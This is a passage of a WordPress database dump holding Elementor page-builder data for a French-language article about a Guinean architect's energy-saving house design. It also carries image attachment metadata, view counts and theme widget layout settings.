bois:<\\/strong>\\u00a0avec un toit en bois effectuant des rotations sous l\'influence du vent, produisant ainsi de l\'\\u00e9nergie d\'origine \\u00e9olienne pour la maison.<\\/p><p>-<strong>Triple vitrage:\\u00a0<\\/strong>rempli d\'argon de gaz tr\\u00e8s isolent et des capteurs solaires permettant ainsi \\u00e0 la maison d\'avoir une seconde source d\\u2019\\u00e9nergie en plus de l\\u2019\\u00e9nergie d\'origine \\u00e9olienne.<\\/p><p><strong>-Mur en lambris de bois:\\u00a0<\\/strong>le bois \\u00e9conomise de l\\u2019\\u00e9nergie, c\'est un excellent isolant.<\\/p><p><strong>-Mur en lambris de bois:\\u00a0\\u00a0<\\/strong>\\u00e9conomise de l\\u2019\\u00e9nergie et conserve la fra\\u00eecheur.<\\/p><p><strong>-V\\u00e9g\\u00e9tation persistante:<\\/strong>\\u00a0Afin d\'\\u00e9viter les d\\u00e9perditions dues au vent.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2017,654,'_elementor_edit_mode','builder'),(2018,654,'_elementor_data','[{\"id\":\"euubokk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bkemspx\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"khcjseg\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<img class=\\\"alignnone size-medium wp-image-417\\\" src=\\\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/architecte-300x169.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"169\\\" \\/>\\r\\n\\r\\nMoustapha Haidara est un jeune architecte Guin\\u00e9en, consid\\u00e9r\\u00e9 par ses pairs comme le meilleur de tous. Il a cr\\u00e9e un concept de maison particuli\\u00e8rement innovant ayant des caract\\u00e9ristiques particuli\\u00e8re:\\r\\n\\r\\n-<strong>Toit en bois:<\\/strong>\\u00a0avec un toit en bois effectuant des rotations sous l\'influence du vent, produisant ainsi de l\'\\u00e9nergie d\'origine \\u00e9olienne pour la maison.\\r\\n\\r\\n-<strong>Triple vitrage:\\u00a0<\\/strong>rempli d\'argon de gaz tr\\u00e8s isolent et des capteurs solaires permettant ainsi \\u00e0 la maison d\'avoir une seconde source d\\u2019\\u00e9nergie en plus de l\\u2019\\u00e9nergie d\'origine \\u00e9olienne.\\r\\n\\r\\n<strong>-Mur en lambris de bois:\\u00a0<\\/strong>le bois \\u00e9conomise de l\\u2019\\u00e9nergie, c\'est un excellent isolant.\\r\\n\\r\\n<strong>-Mur en lambris de bois:\\u00a0\\u00a0<\\/strong>\\u00e9conomise de l\\u2019\\u00e9nergie et conserve la fra\\u00eecheur.\\r\\n\\r\\n<strong>-V\\u00e9g\\u00e9tation persistante:<\\/strong>\\u00a0Afin d\'\\u00e9viter les d\\u00e9perditions dues au vent.\\r\\n\\r\\n&nbsp;\\r\\n\\r\\n&nbsp;\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7jptpz6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"rkl0mp3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"usnd9qg\",\"elType\":\"widget\",\"settings\":{\"wp_gallery\":[{\"id\":417,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/architecte.jpg\"},{\"id\":651,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/4.jpg\"},{\"id\":650,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/3.jpg\"},{\"id\":649,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/2.jpg\"},{\"id\":652,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/6.jpg\"},{\"id\":653,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/6-1.jpg\"}]},\"elements\":[],\"widgetType\":\"image-gallery\"}],\"isInner\":false}],\"isInner\":false}]'),(2019,416,'_elementor_version','0.4'),(2020,655,'_wp_attached_file','2017/10/moustapha.jpg'),(2021,655,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:720;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2017/10/moustapha.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"moustapha-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"moustapha-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2030,658,'_elementor_data','[{\"id\":\"euubokk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bkemspx\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"khcjseg\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignnone size-medium wp-image-417\\\" src=\\\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/architecte-300x169.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"169\\\" \\/><\\/p><p>Moustapha Haidara est un jeune architecte Guin\\u00e9en, consid\\u00e9r\\u00e9 par ses pairs comme le meilleur de tous. Il a cr\\u00e9e un concept de maison particuli\\u00e8rement innovant ayant des caract\\u00e9ristiques particuli\\u00e8re:<\\/p><p>-<strong>Toit en bois:<\\/strong>\\u00a0avec un toit en bois effectuant des rotations sous l\'influence du vent, produisant ainsi de l\'\\u00e9nergie d\'origine \\u00e9olienne pour la maison.<\\/p><p>-<strong>Triple vitrage:\\u00a0<\\/strong>rempli d\'argon de gaz tr\\u00e8s isolent et des capteurs solaires permettant ainsi \\u00e0 la maison d\'avoir une seconde source d\\u2019\\u00e9nergie en plus de l\\u2019\\u00e9nergie d\'origine \\u00e9olienne.<\\/p><p><strong>-Mur en lambris de bois:\\u00a0<\\/strong>le bois \\u00e9conomise de l\\u2019\\u00e9nergie, c\'est un excellent isolant.<\\/p><p><strong>-Mur en lambris de bois:\\u00a0\\u00a0<\\/strong>\\u00e9conomise de l\\u2019\\u00e9nergie et conserve la fra\\u00eecheur.<\\/p><p><strong>-V\\u00e9g\\u00e9tation persistante:<\\/strong>\\u00a0Afin d\'\\u00e9viter les d\\u00e9perditions dues au vent.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7jptpz6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"rkl0mp3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"usnd9qg\",\"elType\":\"widget\",\"settings\":{\"wp_gallery\":[{\"id\":417,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/architecte.jpg\"},{\"id\":651,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/4.jpg\"},{\"id\":650,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/3.jpg\"},{\"id\":649,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/2.jpg\"},{\"id\":652,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/6.jpg\"},{\"id\":653,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/6-1.jpg\"}],\"thumbnail_size\":\"medium_large\",\"gallery_columns\":\"3\",\"open_lightbox\":\"yes\"},\"elements\":[],\"widgetType\":\"image-gallery\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4ivvdi0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1uy6ay8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"k5k2nxn\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Je suis un bloc de texte. Cliquez sur le bouton modifier pour changer ce texte. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2031,658,'_elementor_version','0.4'),(2032,658,'_elementor_css','a:3:{s:4:\"time\";i:1509030060;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2033,658,'_elementor_edit_mode','builder'),(2036,659,'_elementor_data','[{\"id\":\"euubokk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bkemspx\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"khcjseg\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignnone size-medium wp-image-417\\\" src=\\\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/architecte-300x169.jpg\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"169\\\" \\/><\\/p><p>Moustapha Haidara est un jeune architecte Guin\\u00e9en, consid\\u00e9r\\u00e9 par ses pairs comme le meilleur de tous. Il a cr\\u00e9e un concept de maison particuli\\u00e8rement innovant ayant des caract\\u00e9ristiques particuli\\u00e8re:<\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7jptpz6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"rkl0mp3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"usnd9qg\",\"elType\":\"widget\",\"settings\":{\"wp_gallery\":[{\"id\":417,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/architecte.jpg\"},{\"id\":651,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/4.jpg\"},{\"id\":650,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/3.jpg\"},{\"id\":649,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/2.jpg\"},{\"id\":652,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/6.jpg\"},{\"id\":653,\"url\":\"https:\\/\\/guineeinnove.nimbasolution.com\\/wp-content\\/uploads\\/2017\\/10\\/6-1.jpg\"}],\"thumbnail_size\":\"medium_large\",\"gallery_columns\":\"3\",\"open_lightbox\":\"yes\"},\"elements\":[],\"widgetType\":\"image-gallery\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4ivvdi0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1uy6ay8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"k5k2nxn\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>-<strong>Toit en bois:<\\/strong>\\u00a0avec un toit en bois effectuant des rotations sous l\'influence du vent, produisant ainsi de l\'\\u00e9nergie d\'origine \\u00e9olienne pour la maison.<\\/p><p>-<strong>Triple vitrage:\\u00a0<\\/strong>rempli d\'argon de gaz tr\\u00e8s isolent et des capteurs solaires permettant ainsi \\u00e0 la maison d\'avoir une seconde source d\\u2019\\u00e9nergie en plus de l\\u2019\\u00e9nergie d\'origine \\u00e9olienne.<\\/p><p><strong>-Mur en lambris de bois:\\u00a0<\\/strong>le bois \\u00e9conomise de l\\u2019\\u00e9nergie, c\'est un excellent isolant.<\\/p><p><strong>-Mur en lambris de bois:\\u00a0\\u00a0<\\/strong>\\u00e9conomise de l\\u2019\\u00e9nergie et conserve la fra\\u00eecheur.<\\/p><p><strong>-V\\u00e9g\\u00e9tation persistante:<\\/strong>\\u00a0Afin d\'\\u00e9viter les d\\u00e9perditions dues au vent.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2037,659,'_elementor_version','0.4'),(2038,659,'_elementor_edit_mode','builder'),(2039,416,'_elementor_css','a:3:{s:4:\"time\";i:1509030251;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(2044,416,'_li_love_count','4'),(2045,619,'_li_love_count','2'),(2046,662,'_edit_last','1'),(2047,662,'_edit_lock','1509962563:1'),(2048,662,'_wp_page_template','default'),(2051,665,'_wp_attached_file','2017/10/poes.jpg'),(2052,665,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:345;s:6:\"height\";i:345;s:4:\"file\";s:16:\"2017/10/poes.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"poes-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"poes-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2053,666,'_wp_attached_file','2017/10/mayalagny.jpg'),(2054,666,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:636;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2017/10/mayalagny.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"mayalagny-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"mayalagny-199x300.jpg\";s:5:\"width\";i:199;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:10:\"Yvan Brien\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:24:\"Yvan Brien Photographies\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2055,662,'_thumbnail_id','815'),(2060,662,'post_views_count','771'),(2065,670,'_edit_last','1'),(2066,670,'_edit_lock','1509537710:1'),(2067,670,'_wp_page_template','default'),(2070,673,'_wp_attached_file','2017/10/sekou.jpg'),(2071,673,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:696;s:6:\"height\";i:707;s:4:\"file\";s:17:\"2017/10/sekou.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"sekou-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"sekou-295x300.jpg\";s:5:\"width\";i:295;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2072,670,'_thumbnail_id','673'),(2075,670,'post_views_count','2057'),(2083,678,'_edit_last','1'),(2084,678,'_edit_lock','1509537478:1'),(2085,679,'_wp_attached_file','2017/10/Jawards.jpg'),(2086,679,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:768;s:6:\"height\";i:507;s:4:\"file\";s:19:\"2017/10/Jawards.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Jawards-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Jawards-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"Jawards-768x507.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:507;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2087,678,'_thumbnail_id','679'),(2088,678,'_wp_page_template','default'),(2093,678,'post_views_count','178'),(2094,681,'_edit_last','1'),(2095,681,'_edit_lock','1509536835:1'),(2096,682,'_wp_attached_file','2017/10/Culture.jpg'),(2097,682,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:576;s:4:\"file\";s:19:\"2017/10/Culture.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Culture-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Culture-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"Culture-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"Culture-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.7\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:23:\"Canon PowerShot SX40 HS\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1494528834\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.3\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2098,681,'_thumbnail_id','682'),(2099,681,'_wp_page_template','default'),(2104,681,'post_views_count','690'),(2268,740,'_elementor_edit_mode','builder'),(2269,740,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\